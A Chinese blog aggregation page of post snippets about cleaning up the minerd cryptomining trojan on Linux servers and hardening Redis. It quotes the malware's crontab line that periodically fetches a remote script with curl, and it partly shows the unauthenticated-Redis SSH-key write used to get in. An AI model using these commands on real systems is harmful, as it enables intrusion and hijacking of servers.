Linux minerd 进程是一个用来挖掘加密货币的进程,它通常在使用CPU进行挖矿的情况下被激活。红帽Linux是一种基于Linux内核和GNU项目的一个开源操作系统。在红帽Linux系统上,用户可以通过运行minerd进程来进行加密货币的挖矿。
minerd进程的工作原理是利用CPU的算力来解决复杂的数学问题,以获取加密货币作为奖励。这个过程需要大量的计算资源和电力支持,因此有人会选择在空
原创
2024-04-29 10:44:44
116阅读
由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理。现状描述1top可以看到,这个minerd 程序把cpu跑满了2ps aux | grep minerd可知是这个程序: /opt/minerd ---这个不是我们自己启动的,可以断定服务器被黑了这个进程是root用户启动的,代码有漏洞可能性不大
原创
2016-09-08 16:24:30
2043阅读
点赞
Minerd是一款基于CPU的比特币挖矿软件,可以在Linux系统上运行。使用Minerd进行挖矿可以让用户通过耗费计算资源获取比特币,是一种常见的数字货币获取方式。本文将介绍如何在Linux系统上使用Minerd进行挖矿。
首先,用户需要在Linux系统中安装Minerd软件。可以通过命令行方式安装,首先打开终端,输入以下命令进行安装:
```
sudo apt-get update
sud
原创
2024-04-02 10:06:29
232阅读
阿里云上报警提示有异地IP登陆,上去之后发现服务器被黑了。以下是处理过程:木马排查1,首先top发现有minerd对CPU的占有达到了100%,此前这台服务器上是没有跑任何应用的,直觉告诉我minerd有问题哦[root@ll_sas01 ~/.ssh]# ps aux|grep minerdroot 7174 99.6 0.1 239504 5400 ? SLsl 15:08 29:05 /op
原创
精选
2016-10-26 17:31:50
2394阅读
点赞
2评论
杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢我发现我的redis的 bind 0.0.0.0:6379默认的。。。。应该是这边进来的。我自己做了下尝试。。。[root@ll_sas01 ~/.ssh]# redis-cli127.0.0.1:6379> set aa "公钥"OK127.0.0.1:6379> c
原创
2016-10-26 17:33:58
1046阅读
点赞
minerd木马攻击处理场景复原最近比较空闲,首先来整理下工作中遇到的坑,来梳理下笔记事情是这样的,有一天公司有一批服务器设备要下线了,这些机器是不是内网的机器,是合作机房的机器,也就是说是公网的服务器:把以前的老图片翻出来,现在来梳理下:那天收到了某台机器的短信报警,CPU过高,那个机器都快下线了,没有什么业务,怎么还要存在CPU过高的问题:1:首先top查看了大概的负载情况,发现CPU(S)中
原创
精选
2017-03-01 10:28:25
1450阅读
redis 清除minerd进程的方法 1 修改redis配置文件 //禁止高危命令rename-command FLUSHALL ""rename-command CONFIG ""rename-command EVAL ""mypassword设置成自己的密码 采用密码登录requirepass
转载
2019-11-17 07:38:00
127阅读
2评论
现象:就是cpu使用率超级大,能到300%木马脚本内容:export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 
原创
精选
2016-07-22 15:50:05
1135阅读
点赞
发现问题最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下:让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu较大,如下图所示:这个程序并不是我们的正常服务程序,心里一想肯定被黑了,然后就搜索了一下这个程序,果真就是个挖矿木马程序,既然已经知道他是木马程序,那就看看它是怎么工作的,然后怎么修复一下后门。 这个程序放在/opt/minerd下,在确
原创
2021-05-09 15:55:42
1727阅读
挖矿程序minerd,wnTKYg入侵分析和解决 作者:C
原创
2017-09-03 00:06:54
2417阅读
点赞
一:问题说明 1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下然后我查看了运行的进程情况(top 命令),看到一个名为minerd的进程占用了99.5%的CPU 2、minerd是个挖矿程序,什么是“挖矿”,特此百度了一下,所谓“挖矿”实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性。比特币网络会自动调整数学问题
转载
2017-09-05 10:44:34
694阅读
系统安全维护方面做的不够规范和严谨,很容易导致主机被黑客植入恶意MU马被当做肉鸡。这就是一次肉鸡MU马的排查的过程
原创
精选
2022-08-19 09:18:20
373阅读
参考链接:http://www.cnblogs.com/zhouto/p/5680594.html本次产生挖矿minerd入侵的主要原因是由于redis的漏洞造成;redis安全:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/在服务器中执行 top 查询,发现有minerd进程占用CPU达到90
原创
2016-09-08 15:57:50
7867阅读
在日常使用 Linux 系统服务器时,如果系统安全维护方面做的不够规范和严谨,很容易导致主机被植入恶意木马病毒被当做肉鸡。以后就是一次肉鸡木马病毒的排查过程,有助于运维服务器时遇到此情况时进行针对性的排查和修复。 【问题现象】Linux 主机 CPU 跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】这种状况在出现时通过 top 命令可以看到有一个 mine
原创
2022-08-29 13:31:47
75阅读
挖矿程序minerd,wnTKYg入侵分析和解决 作者:C
原创
2017-09-03 00:26:28
1354阅读
点赞
转载请注明出处: 云服务器ECS(Linux) CPU使用率超过70%,严重时可达到1
原创
2023-02-21 11:10:49
192阅读
千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个
解决minerd并不是最终目的,主要是查找问题来源。
解决问题思路
1.打开防火墙,添加规则,关闭挖矿minerd的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A&nb
原创
2016-08-24 15:49:40
1785阅读
top -c把cpu占用最多的进程找出来: 程序的位置: 查看一下计划任务的时志: 把脚本wget下来看一下内容: 杀掉minerd 清空计划任务: 查看/root/.ssh发现有导常: 下载下来该文件,查看内容: 把这个文件清除掉
原创
2022-02-24 13:38:08
222阅读
今天老大手机报警 我检查发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似,下边是他的解决办法http://blog.csdn.net/hu_wen/article/details/51908597但我去查看启动的服务,尽然没有 lady 这个服务。 找不到始作俑者,那个mine
推荐
原创
2017-05-31 18:15:17
10000+阅读
点赞
5评论
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题Hu_Wen遇到的和我最相似,下边是他的解决办法http://blog.csdn.net/hu_wen/article/details/51908597但我去查看启动的服务,尽然没有 lady 这个服务。 找不到始作俑者,那个min
转载
2017-01-04 10:29:32
1358阅读
